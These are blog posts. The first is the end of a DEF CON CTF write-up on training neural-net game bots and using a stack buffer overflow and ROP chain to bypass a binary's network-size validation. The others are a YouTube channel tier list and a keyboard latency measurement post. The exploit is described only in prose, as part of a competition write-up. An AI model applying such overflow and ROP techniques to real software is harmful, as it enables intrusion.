I reverse-engineered all the pointer arithmetic and simplified things to write out a pseudo-C version of the network evaluation function. It seemed to evaluate a number of lineary layers with biases, each followed by either a sigmoid or ReLU activation function (chosen by the input file). The input parsing code hard-coding the number of hidden layers between the input and output layer equal to 1, which was weird and fishy.

Once we had collectively figured out how everything fit together, we wanted to get a bot out there and earning points as fast as possible. First aegis wrote a Python network serializer script and deployed a bot that just set the bias on going forward to run us into the wall so we were a smaller target and not in the expected position for anyone managing to shoot. The next bot had hand-designed weights in the matrices to rotate the ship unless it was ready to fire in which case it shot. We weren’t quite the first to upload a non-empty network (an empty file just shot the wall) but we were something like 2nd.

Part 2. Training a better network

While aegis worked on making a smarter hand-coded bot, I started work on training a real neural net to be a better AI. An alternative I brought up was to write something to compile a domain specific language to weights, using the fact I had learned about in my university machine learning course that you could approximate any function using only one hidden layer by using a specific method of engineering weights to set the value of the output for different regions of input. However, given that both aegis and I had done some deep learning training before we figured it would be easier to just use gradient descent.

I fired up a Jupyter notebook, replicated the architecture, and thought of a way to make a basic AI by writing a Python function to output what we wanted the AI to do given various inputs, and feeding lots of randomly generated input vectors through the function and training the neural net to match those actions like a normal supervised classifier.

Unfortunately it was harder than I expected and it took annoyingly long tuning hyperparameters and how my training setup worked before I even managed to train a network to do one action if the single input was less than 0.5 and another if it was greater:

Next I worked on modifying aegis’s code, which wrote out his hand-coded weights in the correct format, to take the weights from my trained model. Unfortunately the first network I exported this way just didn’t do anything when run in the simulator. So I spent some time investigating the polarity of how PyTorch did biases, trying out different combinations and reasoning through whether I wanted to write things out in row-major or column-major order, all to no avail. I even wrote some code to export aegis’s hand-coded weights using my exporter, and that worked but my model still didn’t.

So after around 2 hours I tried using GDB to trace the execution of my model through the binary while referencing the disassembly in Binary Ninja, to see what was going wrong. To my surprise it seemed to exit before it even ran my model, and exited with a weird error code. I bisected it down to find a validation function that limited hidden layer size to a 2x2 matrix, way too small to train anything significant. I posted the bad news in Slack and it turned out samczsun had figured this out a while ago but in the hectic phase of everyone working on different reverse engineering in parallel, the rest of us didn’t hear.

Part 3: The exploiting and fancier bots

It looked like the “rop” in the challenge name wasn’t just a callback to last year’s “ropship” challenge and we’d have to exploit our way into more model capacity. We had already found a buffer overflow on the stack with unbounded user-controlled contents, in the code which fetched the inputs to feed to the network. It seemed like we could craft a ROP exploit to manipulate the size parameters of the network to change them after they had been validated. ROP is a technique where if you can overwrite the address the function call should return to on the stack, you can make it return anywhere you want, allowing you to execute any sequences of suffixes of any functions in the program to perform your exploit. There was a seccomp policy and some weird custom “ASLR” and “sandboxing” that simultaneously made some ROP a bit easier while keeping things contained so we couldn’t easily just break out and exploit the challenge or run arbitrary code as our AI.

I’ve never done ROP so aegis and samczsun started work on that while I patched out the validation in my personal copy of the binary and got to work on training a better bot to work with the eventual exploit. In the mean time chainsaw10 had written some better Python AI functions using a patched simulator to test them out, which I worked on training a model to match. It was again surprisingly difficult. I had a lot of trouble getting it to be able to do actions like shielding, which only needed to happen on around 5% of random inputs. The network would just always output 0.0 for those actions except on some lucky training runs. I suspect something was going wrong with my initialization or gradients such that on most runs the shield output would fall into a place it could never get a gradient signal to recover from.

Three hours later at around 6am I managed to get a basic AI trained which turned towards the closest bot, moved towards it, shot at it and shielded. At that point I went to sleep, the contest had been on a 9 hour pause and I intended to wake up again before it restarted, when the exploit would hopefully be finished.

I ended up sleeping past my alarm until 2 hours after the contest started again. When I woke up, aegis and another teammate had finished the ROP exploit and wrote a converter that added the exploit to the latest bot I trained, and it was deployed and doing decently! The exploit development had hit some snags but eventually landed on something which overwrote the return address to restart the execution of the function with the buffer overflow multiple times to get various things overwritten, to patch in a new network after the hidden size validation had passed on the original overflowing network.

Unfortunately the bot we uploaded was still kind of crappy, it knew how to move around the arena towards a target but it kept doing that until it was right on top of them and then often died if the opponent then shot us at point blank range. It also only used the sine of the angle to the enemy so due to an ambiguity it would sometimes run in the exact opposite direction.

So aegis and I worked on a better training setup with a GPU box and larger networks. In the mean time chainsaw10 had improved the AI function to not get too close to enemies and also be able to dodge bullets. We still had tons of trouble reliably training a network to match the function, but eventually ended up with a slightly better version of our previous bot and a version without very good aim trained on our new bot code. In simulations with our own bots the very accurate but simpler bot did better, so we uploaded that, but an hour later and one hour before the end of the contest I saw it wasn’t actually doing well against the other teams, so I uploaded the more sophisticated bot and it did much better and even managed to win a few rounds. It still had crappy aim and sometimes did the wrong thing though, and it had taken a lot of tweaking to get it to learn to shield.

Postscript: Compiling to neural nets

In hindsight given how much trouble we had training our small neural networks, in what seemed like it should have been a really easy task, it seems like the best approach was to use the universal function approximation proof style tricks to write a compiler from a logic DSL to network weights that exactly implemented the function. I’m still not sure whether we had a hard time training because training shallow networks with small capacity is just hard, or there was some technique we were missing to get our training to work well.

In the last two hours of the contest I worked on a prototype of the compiler approach for fun and managed to get it mostly working. I was using only one hidden layer so my input DSL required providing some constant thresholds on inputs, AND gates on those threshold signals, and then each output was an OR of some of the AND results. This was enough to implement any truth table on thresholds, but it was incredibly wasteful of network capacity to do so and the flattening of the decision tree to a truth table still needed to be done manually. I had some ideas for how to automatically flatten a decision tree Python function into a truth table though using overloaded operators that detected thresholding on the inputs and breadth-first searched to explore the space of outputs, but the contest ended and I wanted to catch up on sleep after that.

I talked to my friend on team PPP, since PPP had a bot with really good clean behavior. He said that PPP did go the route of implementing a compiler to network weights, which could compile an arbitrary decision tree that included vector space arithmetic. They did it without flattening the tree by using multiple hidden layers, which the exploit allowed you to use. Unfortunately while as far as we could tell we should have been able to use multiple hidden layers, when we tried a multi-layer network it failed to do anything, and we never bothered to figure out why, since our training process worked about as well with one hidden layer.

Conclusion

Overall this is the challenge I had the most fun with this DEF CON CTF finals, it combined reverse engineering, neural nets and exploitation, and had different possible valid approaches to solve it. It was super fun to upload an AI and see it dodge bullets and beat other teams based on a tower of hard-won knowledge and code from hours of work reverse engineering and tinkering. In general I get really into DEF CON CTF challenges because they’re a great combination of tractable problems I can work with friends on with fun competitive time pressure, that also are really interesting and difficult to make me feel like I’m exercising all of my available skill.

This was only the last challenge I worked on. Earlier in the contest I worked on rorschach helping aegis by figuring things out and coming up with tweaks to make our black box hill climbing solver exploit a neural net classifier faster, and coming up with defensive checks against other teams’ attacks. In the middle I did miscellaneous reverse engineering and spent hours working on attacks for exploits teams patched before we were done implementing them, and an AI for another multi-team game that closed before I could deploy it. My other AI did have the best dang debugging visualizations a rushed CTF hack has ever seen though thanks to my affinity for HoloViews, which might have had a little to do with why it was too late…

Sorry, your browser doesn't support embedded videos.

My tier list of interesting YouTube channels

2020-07-19T00:00:00+00:00

I watch a lot more YouTube than I do any other type of video content, and my favorite type of YouTube videos are interesting ones. I hesitate to call them “educational”, because they’re often not necessarily trying to teach, but to me the category distinction is they’re trying to be interesting in some way that pertains to the real world rather than just purely entertaining like video game content or comedy.

I often find myself recommending these channels to friends, so I figured I might as well write up my endorsements, and I made it a tier list since I love the format. There’s a huge variety of really cool and impressive channels out there with kinds of content you can’t find anywhere else, and I’ve watched a lot of them for years and want to highlight them. The tier choices can be kinda arbitrary and I didn’t pay any attention to the ordering within tiers. Note that this is a tier list of my favorite interesting YouTube channels:

“my”: These are ordered based on what I feel like endorsing/recommending, other people with different interests may place them higher or lower, and some really well-made popular channels are lower down just because they don’t capture me as much.
“favorite”: Even once we get down to “D tier” they’re still great stuff I watch regularly and above everything I’ve encountered and wasn’t into
“interesting”: There’s other YouTube channels I watch and enjoy, like some video game channels, which are more pure entertainment and aren’t included here.

My blog posts tend to be about programming but I barely watch any programming channels. I mostly watch all sorts of random interesting channels on everything from machining to videography. Most of these channels are pretty accessible to anyone interested even if they aren’t versed in the subject, while still often targeting something obscure or impressive rather than always basic stuff, which is something that I think YouTube channels tend to do better than blogs. But on the flipside this makes most programming channels less interesting to me, since I am versed in the subject.

S Tier: Masterpieces

The channels in this tier are some of my favorite things on the internet. They all only release videos every few weeks or months but that’s because they’re all a single person putting monumental effort into each one. When a video comes out on one of these channels its the highlight of my day. For a video to be this tier it needs to be fascinating, well-produced, demonstrate incredible skill I can be in awe of, and be something I’d pay at least $5/video (and often more) if they started paywalling it now. I subscribe to all of these channels on Patreon, except for Kiwami Japan because they don’t have one.

Despite having hundreds of thousands to millions of viewers, none of these channels would ever have been green-lit as a TV show as-is, because they’re too weird or niche or technical. They also can only really work as well as they do in the video format, and got their start on YouTube. I’m happy that the modern internet allows channels like these to not only exist but often make a living.

Clickspring

Clickspring is a channel about clockmaking, and watching it is wireheading on pure craftsmanship. I’ve never done any machining and don’t plan on ever making a clock, but his videos along with everything he makes in them are gorgeous examples of making everything with care and a commitment to excellence. This shows through in everything he does, from making custom screws with stunning blue oxide finish and hand-rounded interior ends that aren’t even visible when assembled to doing original research and building some authentic ancient tools for his reconstruction of the Antikythera mechanism. He puts the same care into his videos as the work itself: the camera shots and lighting are beautiful, the machining operations are seamlessly sped up at the right times to fit in the video but show the key moments, and he often includes nice composited overlays of the CAD model on top of the raw stock so you can understand what he’s doing, and the narration, music and sounds of the machining are excellently done to give the videos a relaxing feel. Every Clickspring video is just a delightful experience to watch.

He also does videos without narration that just beatifully show all the machining and other work that goes into making something, this video being the most impressive example. He has a second channel called Clickspring Clips where he posts 2-4 minute non-narrated videos showing the making of one interesting part of his larger projects. His Patreon also has many exclusive videos once you watch all the public ones.

Applied Science

Ben Krasnow’s channel Applied Science has been the flagship channel of engineering and science YouTube for many years. In every video he explains some new and interesting piece of science and engineering he’s replicated in his shop. He’s made aerogel, a water jet cutter, a plasma sputtering chamber, an EDM drill, air bearings, an electroluminescent display, an LCD, and the source of his earliest publicity: a scanning electron microscope. He’s a truly prolific and incredible engineer who works with all kinds of electronics, machining, chemistry, physics and software. Every video leaves me in awe of him. Often he’ll be the first non-professional to try recreating something based on a procedure from papers and have to do dozens of failed experiments before making a video documenting the process and all the extra considerations. His videos and skill are incredible and I’ve learned a lot about the process of scientific lab work from watching them.

Captain Disillusion

Captain Disillusion has been on YouTube for 12 years now, originally in obscurity but gradually growing to millions of viewers. He goes over trick and hoax viral videos and explains the visual effects used to make them. The thing that’s incredible is the production value: Costumes, makeup, well-written scripts, and a ridiculous density of impressive visual effects. Captain Disillusion is what happens when an incredibly talented and driven visual effects artist puts an entire month of full time work into every single 5 minute video. He’s done streams and time-lapses before of him spending dozens of hours on a 3 second visual effect for a throwaway gag.

A typical video consists of a well-written and edited intro of him introducing a faked video, doing a detailed breakdown of all the components of the effect but quickly thanks to amazing visual aid footage, then him just one-upping the original video by doing the effect so much better than anyone else has ever done it, without the tells he went over. Here’s some other, good ones but really every single one is excellent.

Kiwami Japan

This is a weird and wonderful channel that to me really exemplifies what’s great about YouTube. Most videos are of the form “sharpest X kitchen knife in the world” with a thumbnail of a hand holding a weird knife in the same pose. Some examples of X are “Fungi”, “Paper”, “milk”, “Pasta”, “Underwear”, and “smoke”. I originally ignored suggested videos from this channel because I assumed they were some weird click-bait that didn’t really make a knife from those materials, and that was tragic because he really does and it’s amazing.

Every video has no talking or words except for occasional subtitles, and follows the process starting from the raw material, demonstrating all the processing steps required to make a hard substance out of it, casting a knife blank, sharpening it, and testing it. At some point early in the channel’s history someone must have commented that the videos were like ASMR videos because after that he got a high quality microphone and puts a lot of emphasis on the sounds.

The coolest part is he’s clearly really good at materials science and every video has amazing steps all done in his apartment. Lets take the “sharpest Seawater kitchen knife in the world” video as an example: It starts with a shot of him getting huge jugs of seawater from the ocean and collecting shells on the beach. At home he boils the seawater into salt and a solution he labels “magnesium chloride”. Then he puts a seashell on top of a charcoal briquette and puts it in an insulating firebrick box in his home microwave-oven-thing and cuts to it coming out totally calcified (apparently you can do that without a furnace??). He grinds it up with the subtitle “quicklime”, puts it in water and uses a thermal camera to show the exothermic reaction to get slaked lime. Cut to him combining a concentrated sea brine with the lime water to get “magnesium hydroxide + salt”. He adds water to dissolve the salt and filters out the magnesium hydroxide, combines it with the magnesium chloride from earlier, dries it, uses his handy durometer to show it fails a hardness test. He pops the magnesium hydroxide in his charcoal microwave furnace to get “magnesium oxide” and shows that this time when combined and dried it yields a very hard rock-like substance. Cut to him pouring a bunch of it in a rectangular plastic box, drying it and sawing out a knife shape. Then his famous sharpening sequence with increasingly fine knife stones, followed by the ever-present cucumber chopping test (complete with weird cucumber reveal out of godzilla-themed rubber gloves). He finishes by showing that the “magnesium cement” (Wiki link) doesn’t immediately dissolve in watera and that it can also be combined with dirt to make bricks.

I can’t see anything remotely like this every being green-lit as a TV series, but every video is brilliant and relaxing, they all get millions of views with zero advertising spend, because everyone likes them and recommends them to friends and algorithmic recommendations respond to that in a way that human TV producers wouldn’t have the guts to. People complain about the “YouTube algorithm”, but at this kind of thing it truly shines.

Stuff Made Here

Stuff Made Here is the newest channel to enter S tier. When YouTube first recommended one of his videos to me 4 months ago the channel had just started with a few videos and I thought “huh how is this brand new channel getting hundreds of thousands of views”, then I watched the video and thought “okay wow, apparently if you make really excellent stuff from the start it can become popular on YouTube super fast”. He just makes really interesting and impressive videos where he uses his skill in many different disciplines of engineering to make cool stuff and then gives interesting descriptions of all the considerations, testing, engineering, fabrication and failures that went into making it.

For his most popular video he makes a basketball backboard that always directs the ball into the hoop. He designs and builds a custom mechanism to move the backboard to any distance and angle using rods that minimize the weight on the board so it can move quickly, describing the kinematic principles and how he constructed it using CNC plasma cut and spot welded sheet metal with 3D printed joints. Then he describes the clever custom algorithm for filtering out the basketball from other moving objects in the depth camera by fitting a ballistic curve to all possible object trajectories, as well as the software for extrapolating and calculating the required backboard position. The way he did everything is quite impressive and, like all his projects, he did it in only a few weeks while also having a day job.

What sets him apart from other YouTube makers is not only the skill in so many different areas that his projects display, but also the detailed explanations of the entire engineering process including the considerations, math, algorithms and failures rather than just the fabrication. If this sounds good to you, you should watch every single one of his videos including the ones that might not look that interesting. There’s not that many yet, but there might be soon since he somehow has also been managing to post more frequently than anyone else in my S tier (have I mentioned he also has a day job!?).

A Tier: Highly recommended

These channels are still quite excellent, but fall short on one or more aspects that would make me feel like putting them in S tier. I still highly recommend you check them out if they sound interesting though, they’re really great and I’m still very excited when I see one of them post a new video!

Tech Ingredients: Long and detailed technical videos of interesting projects demonstrating cool science and engineering concepts. They build really high quality demonstration pieces for each video and lots of the concepts they look into are little known ones like magnetohydrodynamics, how helium is an incredibly good sound suppressor and plasma physics. The main presenter is super knowledgeable and every video has some really interesting things. It’s a bit slow paced but I fix that by always watching on 2x speed. They also just posted a Best Of clips compilation video.
Practical Engineering: Explains interesting things from civil engineering often with cool models and demonstrations. I found this one on hydraulic ram pumps really cool.
Dan Gelbart: Dan is an incredible engineer who made a fortune selling companies and now has an amazing machine shop, with lots of tools he’s built or modified himself. He doesn’t post videos very often but the main draw of his channel is the 7 year old 19-part series on tools and techniques for building prototypes. It’s a masterpiece of incredible knowledge, impressive designs and great tips. I recently rewatched the whole series.
NightHawkInLight: Videos of small interesting projects beautifully filmed and explained. I particularly liked this one about making a carbon filament light bulb.
The Thought Emporium: Lots of different types of DIY science projects including DIY genetic engineering. In his craziest video he engineers a benign virus to put lactase genes in his intestines to cure his lactose intolerance for months (most of the video is explaining why what he did was reasonably safe). More recently he’s been uploading long live streams but look back a bit for the shorter science project videos.
Primitive Technology: Guy goes out into the woods in Australia and makes pottery, metal, shelter, tools and materials starting with no tools at all. This video about making a kiln to smelt iron is really good.
NileRed: Beautiful and interesting videos about chemistry accessible to someone who knows very little about chemistry. This recent video about making superconductors is particularly good.
This Old Tony: Really well-produced entertaining and funny machine shop and engine videos that usually use some small machining project to explain a concept or technique.
Steve Mould: Interesting science concept explanation videos with demonstrations. I was waffling between A and B tier but this phenomenally cool recent video on optical rotation blew me away and secured his spot in A tier.

B Tier: Very Good

At this point we’re still in the realm of high quality channels where I’ll immediately watch any new video they put out. Some of these channels have occasional top quality videos that would put them in A tier if they posted more regularly or had more consistent quality.

The Hacksmith: Skilled engineers with a substantial budget and machine shop try to make real life versions of gadgets from fiction. Their main audience is kids and non-technical people and it shows, but many of their videos have pretty cool engineering, and their build montages are neat.
Technology Connections: Guy explains interesting bits of technological history and science behind everyday gadgets. Like this video on how rice cookers use some neat physics tricks.
Tier Zoo: A biologist explains interesting animal facts as funny parodies of video game commentary and tier lists (I am partial to the tier list format as evidenced by this very tier list). This one on turtles is pretty good.
Sam Zeloof: One of the only people to successfully produce a silicon integrated circuit at home, and when he was in high school. This year he started putting out high-effort videos on cool equipment used in the process.
Tom Stanton: Implements really creative and cool engineering ideas mostly using a lot of 3D printing. Some of his coolest videos are building drones using weird things like gas thrusters, reaction wheels, the Coanda effect and a single rotor with no swashplate.
Demoscene High-Quality Videos: 64k intros, where people write programs that produce beautiful visuals and audio using an executable less than 64 kilobytes, are perhaps my favorite art form accross all art forms. They often use very non-standard rendering techniques that lead to unique visuals, have good electronic background tracks, and the whole time I marvel at the technical wizardry of the tiny size. Not all the best videos are on this channel and not all the ones on this channel are good but it has many good ones. My favorite intro group is Logicoma, even before I found out they use Rust. My favorites of their stuff: Engage, Dope On Wax, Trash Panda and Elysian. Favorites by other groups include on, Zetsubo (4k!), delight, Offscreen Colonies and the timeless.
CNLohr: Really interesting and cool electronics projects. Examples include reverse engineering the HTC Vive and making a custom Linux C SDK for it, running a custom Minecraft server on a microcontroller and pretty LEDs.
Inigo Quilez: Inigo is famous for his excellent website with lots of computer graphics tips especially around signed distance fields. More recently he’s been uploading high effort explanations, live coding and pretty fractals to his YouTube channel.
Tom7/suckerpinch: Tom7 is known for his incredibly good high-effort SIGBOVIK technical joke conference papers. What I only learned later is often he makes great funny YouTube videos explaining his crazy hacks like.
Real Engineering: Well-produced and interesting explanation videos on various engineering topics. From the engineering of fighter planes to flood control systems in The Netherlands.
Tom Scott: Popular channel mostly focusing on talking about random interesting places with neat stories around the world.
You Suck At Cooking: Funny comedy cooking videos that are actual recipes. Videos vary on how much they focus on being funny vs teaching good recipes. This one and this one are pretty good.

C Tier: Someone being really good at something

I’ve dedicated C tier to channels where I watch them purely to marvel at someone being really good at something. I like watching people do impressive things or perform at the highest level, it’s inspiring and also just cool to learn about how they do it. They don’t necessarily have to be impressive in an absolute sense, although many are, just impressive relative to my skill level (often zero in their area). The reason these aren’t in higher tiers is either that I’m not as interested in the subject but they captured me anyways, or their videos are not as high in density and quality.

Pannen: Details various glitches used for an automated Super Mario 64 speedrun where he tries to minimize use of the A (jump) button. Really interesting just seeing how insane the tricks can be. Best and most famous video is this commentated one from his other channel about paralell universes.
Daniel Schiffer: Videographer who goes into how he shoots and edits commercials, and he’s really good at it so his videos are great.
Tucker Gott: Paramotor pilot. I have no plans on ever paramotoring but it’s cool to watch and his “Reacting To Crash Videos” series is really interesting, seeing him break down what kind of safety considerations come into play and how things can go wrong.
Akiyuki Brick Channel: Incredibly cool and complex Lego mechanical contraptions. This is a great combination of many of his designs and this recent video is aesthetically fun.
GeoWizard: Guy who is really good at GeoGuessr, that is super knowledgeable about geography and all sorts of tricks to figure out where you are when plopped randomly on Street View. This guy is allegedly better but IMO less entertaining.
Media Molecule: Lots of videos about Dreams, the most impressive feat of software engineering I can think of, but that’s another potential future article. Includes compilations of cool creations, tutorials from talented artists, and explanations by developers of how it works.
Jonathan Blow: Recorded live streams of programming and demoing his game and new programming language/compiler. Clearly very skilled, also overly brash at times, but his ideas and perspective is interesting and his videos are the only ones I watch of live programming.
Sethbling: Does Super Mario World speedruns involving code injection via carefully placed shells and a glitch to warp directly to the credits, as well as various other technical video game trickery.
Harstem: Professional StarCraft 2 player. Critiques people’s submitted replays, plays serious games while explaining his thoughts, tries playing with terrible strategies and winning purely on having better mechanics. Interesting to see what kind of thought, considerations and practice it takes to get to the highest level in a competitive strategy game.

D Tier: Good quality stuff I like watching

These are just a whole bunch of channels I’m subscribe to, where I’ve watched a bunch of their videos and liked them. I may not watch every video from all of these channels, but the ones I’ve decided to watch have been good and I’ll often watch new ones when they pop up. Some of these channels are really well made and might be in other people’s S tier, I’m just not as interested in them. If you’ve liked my other recommendations I encourage you to check these out! I’ve split them up based on the broad theme of what type of videos they have:

Explaining

Two Minute Papers: Short explanations of interesting machine learning and computer graphics papers.
Makin’ Stuff Look Good: Tutorials on how various cool shader effects work.
Keystone Science: Some cool science videos.
Cody’sLab: Miscellaneous geology, farming and engineering.
Blender Guru: Really good Blender 3D modeling tutorials. I learned a lot about what goes into photorealism that I applied when choosing features for my path tracer.
Bruce Yeany: Science teacher who makes cool demonstrations.
Smarter Every Day: Very popular science and engineering videos.
AvE: Crass guy with an idiosyncratic style of speaking has a cool series called “Bored Of Lame Tool Review?” where he takes tools apart, explains how they work, critiques their design and guesses how they’ll fail.

Making

bitluni’s lab: PCBs and neat huge LED walls.
Strange Parts: Tours of cool Chinese factories.
James Bruton: 3D printed cool robots.
Brick Experiment Channel: Interesting engineering using Lego, like making submarines.
Simone Giertz: Originally made shitty robots, now makes miscellaneous cool artsy objects.
BPS.space: Very fancy model rockets with cool control systems, like Falcon propulsive landing.
Allen Pan: Cool engineering projects kind of in the style of The Hacksmith.
Mark Rober: Interesting engineering and science projects.
Peter Sripol: Makes his own small and model airplanes.
Michael Reeves: Comedy robot videos.
I Like To Make Stuff: Miscellaneous crafts.
Jairus of all: Some cool projects.
Breaking Taps: CNC milling, making molds. Well produced, good at explaining the challenges and design process.
How To Make Everything: Makes things like lenses, chocolate, clothing and food from scratch harvesting and processing all his own materials.
Matthias Wandel: Impressive woodworking and wooden contraptions.
The Taste Emporium: Cooking channel by the same guy as The Thought Emporium about making very fancy recipes.
Joseph’s Machines: Really amazing Rube Goldberg machines.
Makercise: Making a Gingery lathe and shaper from scratch by aluminum casting.
EvanAndKatelyn: Miscellaneous home crafts and art.
I did a thing: Comedy DIY videos like “Can I make a spoon using only a spoon”.
DIY Perks: Well-made DIY projects mostly building custom lighting and weird computer equipment.
Ferris: Really good programmer, part of my favorite demo group Logicoma, interesting streams.
The Brick Wall: Sophisticated and impressive working Lego farm equipment and factories.
Colin Furze: Wild engineering projects often involving making dangerous but impressive vehicles.

Other

JL2579: Technical Minecraft player. I don’t play Minecraft anymore but still love seeing what kind of weird behaviors they find and exploit to build useful Minecraft contraptions.
ilmango: Another impressive technical Minecraft player.
Curry On!: A good programming conference that tends to have talks I like watching.
Strange Loop: Another good programming conference with lots of talks I’ve liked.
Roger Kilmanjaro: Really beautiful minimalist CG looping animations that are very much my aesthetic.

Measuring keyboard-to-photon latency with a light sensor

2020-05-20T00:00:00+00:00

For a long time when I’ve wanted to test the latency of computers and UIs I’ve used the Is It Snappy app with my iPhone’s high speed camera to count frames between when I press a key and when the screen changes. However the problem with that is it takes a while to find the exact frames you want, which is annoying when doing a bunch of testing. It also makes it difficult to find out what the variability of latency is like. I had already made this kind of testing easier by adding a mode to my keyboard firmware which changes the LED color after it sends a USB event, but that only made it a bit faster and more precise. I wanted something better.

So I followed in the footsteps of my friend Raph and made a hardware latency tester which sends keyboard events and then uses a light sensor to measure the time it takes for the screen to change! It was quite easy and in this post I’ll go over some of the latency results I’ve found, talk about why good latency testing is tricky, and explain how to build your own latency tester.

Basically my latency tester is a light sensor module from Amazon held by an adjustable holder arm wired to a Teensy LC microcontroller which presses “a” and waits until the light level changes, then deletes it and keeps collecting samples as long as a button is held. Then with a short press of that one button it will type out a nice latency histogram that looks like this:

lat i= 60.3 +/-   9.3, a= 60, d= 59 (n= 65,q= 41) |    239_                      |

This line tells me the average latency of insertions (i=), deletions (d=) and both put together (a=), the standard deviation of insertion times (+/-), measurement count (n=) and quality (q=), and a little ascii histogram where each character is a 10ms bucket and the digits proportionally represent how full the bucket is. The _ represents a bucket with at least one sample but not enough to be at least one ninth of the top bucket, so I can see tail latencies. Here’s what it looks like (pictured with portrait monitors but all tests were done in landscape):

I also made it so if you press the button again, it will type out all the raw measurements like [35, 35, 33, 44] so you can do custom plotting:

Monitor latency

I’ll start out with my favorite set of results:

Sublime Text, macOS, distraction-free full-screen mode on two 4k monitors:
lat i= 35.3 +/-   4.7, a= 36, d= 36 (n= 67,q= 99) |  193       | Dell P2415Q top
lat i= 52.9 +/-   5.0, a= 53, d= 54 (n= 66,q= 45) |   _391     | Dell P2415Q bottom
lat i= 65.1 +/-   5.0, a= 64, d= 63 (n=109,q=111) |    _292    | HP Z27 top
lat i= 79.7 +/-   5.0, a= 80, d= 80 (n= 98,q=114) |       89_  | HP Z27 bottom

There’s a lot to observe here:

First of all, I like how the single-line fixed-width histogram format lets me put results next to each other in a text file and label them to the right for comparison.
We can see the expected difference of 16ms between the latency at the top and bottom of each monitor from the time it takes to scan out the rows during a frame at 60hz.
The standard deviation is just a touch over the 4.6ms that’s inherent to the uniformly-distributed variance that comes from being misaligned with a 16ms display refresh period.
The HP Z27 is around 30ms slower than the Dell P2415Q! And that’s measuring from the start of when the change is detectable, I’m pretty sure the Z27 also takes longer to transition fully. With the Z27 and Sublime almost half my end-to-end latency is unnecessary delay from the monitor!

All measurements in the rest of this post are accordingly done on my Dell P2415Q. Both monitors have response time set to “fast”, the Z27 has even higher response time settings but they only affect transition time and introduce unsightly ghost trails without helping initial latency.

The perils of measurement

Taking good latency measurements is actually quite difficult in more ways than you might think. I tried harder than most people to get realistic measurements and still failed the first few times in ways that I had to fix.

Actually measuring end to end latency

First of all, the reason to use a hardware latency tester is that there are many incomplete or potentially deceptive ways to measure end-to-end latency.

There’s a really excellent famous blog post called Typing With Pleasure that compares latency of different text editors on different operating systems with good analysis and pretty graphs. However it does this by simulating input events and screen scraping using OS APIs. I haven’t done any overlapping measurements with his so can’t point to anything specifically wrong, but there’s lots of potential issues with this. For example inspecting the screen buffer on the CPU might unduly penalize GPU-rendered apps due to window buffer copies under some ways that capture might work. Simulated input may hit different paths than real input. Regardless, even if it does give decent relative measurements (and you can’t truly know without validating it against an end-to-end test), it doesn’t tell you the full latency users experience.

Using 1000hz USB polling

One source of latency users experience that my tester doesn’t measure is keyboard latency. Many keyboards can introduce more latency than my entire keyboard-to-photon latency (including mine in the past) due to 8ms USB polling intervals, low keyboard grid scan rates, slow firmware, and more debatably different mechanical design.

You can’t just use any microcontroller that can emulate a keyboard to build a low-variance latency tester because they probably use default 125Hz polling. Luckily my go-to microcontroller the Teensy LC is one of few to default to 1000hz.

Ensuring good signal strength

For the first while after I built my latency tester I didn’t have any measurement of signal strength. Eventually I got confused by some measurements in slightly different scenarios with the same app and screen having wildly different results. I did some testing and figured out that sometimes with small fonts or poor sensor placement the change in screen contents would only barely be detectable so I’d end up measuring until the monitor finished transitioning when usually I measure until when the monitor starts transitioning (which is its own tricky subjective measurement choice).

I knew to suspect transition time, because before I wrote the firmware I played around with just sampling the light sensor every millisecond and using the Arduino serial plotter to plot measurements as I typed and backspaced a letter just to see what the signal looked like. You can see that some combination of the light sensor and the monitor take nearly 100ms to fully transition. Based on filming with Is It Snappy it seems like it only takes my Z27 about 20ms for the screen to perceptually finish transitioning.

To avoid this I added a peak to peak signal strength measurement after the full transition to my output so I could ensure I was getting adequate resolution for my threshold of 5 steps to be near the beginning of the transition. These are the numbers you see after q=. I learned that it’s important to keep font sizes large and screen brightness settings high.

Significant variation from small differences

It’s possible for seemingly small differences in what’s being measured to make noticeable differences in latency. For example I wanted to see if there was a significant difference between the latency of Sublime and VSCode on a small file with plain text highlighting compared to a large file with a complex highlighting grammar and an autocomplete popup. Sure enough there was, but after noticing some variability I did a bunch more testing and discovered that the latencies were noticeably different between typing ‘a’ on a blank line and typing ‘a’ after an existing ‘a’ (‘aa’).

Here’s the results upon making a new line after line 3469 of 6199 of the huge parser.rs, all taken with similar sensor positioning lower down my Dell monitor than the very top.

lat i= 40.2 +/-   4.1, a= 40, d= 39 (n= 38,q= 90) |  _89           | sublime small .txt

lat i= 41.2 +/-   6.9, a= 41, d= 42 (n= 54,q= 92) |   992          | sublime aa parser.rs
lat i= 43.6 +/-   6.1, a= 43, d= 42 (n= 48,q=100) |   492          |
lat i= 52.2 +/-   6.0, a= 52, d= 52 (n= 26,q=100) |    49          |
lat i= 44.3 +/-   5.6, a= 43, d= 42 (n= 45,q=100) |   391          |
lat i= 42.7 +/-   7.6, a= 42, d= 42 (n= 46,q=100) |  _491          |

lat i= 48.1 +/-   6.8, a= 49, d= 50 (n= 43,q= 89) |   269          | sublime a parser.rs
lat i= 43.9 +/-   5.4, a= 48, d= 52 (n= 32,q= 97) |   197          |
lat i= 47.8 +/-   8.4, a= 49, d= 49 (n= 29,q= 97) |   197_         |
lat i= 46.1 +/-   6.8, a= 47, d= 49 (n= 42,q= 97) |   196_         |

lat i= 63.3 +/-   9.3, a= 63, d= 62 (n= 68,q=118) |    _963__      | vscode aa parser.rs
lat i= 63.6 +/-   7.6, a= 64, d= 65 (n= 71,q=139) |    _49__     _ |
lat i= 62.3 +/-   6.3, a= 61, d= 59 (n= 52,q=132) |    _791        |
lat i= 62.0 +/-   5.8, a= 61, d= 60 (n= 40,q=111) |    _49_        |
lat i= 61.9 +/-   9.7, a= 62, d= 61 (n= 35,q=111) |     981_       |

lat i= 53.1 +/-   7.7, a= 51, d= 49 (n= 54,q=116) |   _79__        | vscode a parser.rs
lat i= 52.2 +/-   6.3, a= 52, d= 51 (n= 41,q=133) |    692         |
lat i= 53.2 +/-   7.8, a= 52, d= 52 (n= 57,q=134) |    591_        |
lat i= 52.1 +/-   7.1, a= 52, d= 52 (n= 55,q=134) |    591_        |

I did a bunch of runs at different times and with minor changes to confirm the effect, and you can see that there’s variation between measurements of the same scenario, but noticeably larger variation between just typing ‘a’ and adding an ‘a’ after an existing ‘a’. Try looking at the ‘a=’ column since it includes both insert and delete measurements so has the least cross-run noise. Sublime is faster at ‘aa’ than ‘a’ and VSCode is faster at ‘a’ than ‘aa’.

